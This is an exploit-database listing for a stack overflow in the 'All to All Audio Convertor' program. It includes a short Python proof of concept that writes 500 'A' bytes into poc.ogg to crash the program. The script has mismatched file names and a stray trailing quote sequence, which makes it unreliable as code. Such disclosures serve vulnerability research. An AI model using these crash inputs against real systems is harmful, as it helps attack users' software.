All to All Audio Convertor files stack overflow poc

vendor:

All to All Audio Convertor files

by:

ItSecTeam

7,8

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: All to All Audio Convertor files

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

All to All Audio Convertor files stack overflow poc

This exploit is a proof of concept for a stack overflow vulnerability in All to All Audio Convertor files. It creates a file called 'poc.ogg' which contains 500 'A' characters. This can be used to overwrite the stack and potentially execute arbitrary code.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# All to All Audio Convertor files stack overflow poc
# #############################################################################
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Special Tanks : PLATEN - M3hr@n.S - B3hz4d - Cdef3nder 
# #############################################################################
# EAX 10624DD3 ECX 00000000 EDX 012200C0 EBX 100018A0 ESP 0012E59C EBP 0012EA14
# ESI 0012E5CC EDI 10001010 EIP 100018DA

try:
	file=open("poc.ogg",'w')
	Buff = "\x41" *500 # .WMA ...
	file.write( Buff )
	file.close()
	print   ("[+] File created successfully: poc.ico" )
except:
	print "[-] Error cant write file to system\n""""